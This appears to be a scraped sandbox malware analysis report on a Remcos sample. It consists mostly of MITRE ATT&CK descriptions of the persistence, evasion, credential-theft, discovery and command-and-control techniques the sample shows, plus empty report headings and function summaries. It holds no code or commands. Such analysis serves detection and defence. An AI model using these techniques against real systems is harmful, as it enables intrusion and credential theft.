Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report IQl00lxPjo

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Function 0040CD09, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98
libraryloaderCOMMON

Function 00404E9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96
timethreadCOMMON

Function 105910CA, Relevance: 3.4, APIs: 2, Instructions: 379
memorylibraryCOMMONCrypto

Function 0040C2BE, Relevance: 63.8, APIs: 16, Strings: 20, Instructions: 774
synchronizationCOMMON

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre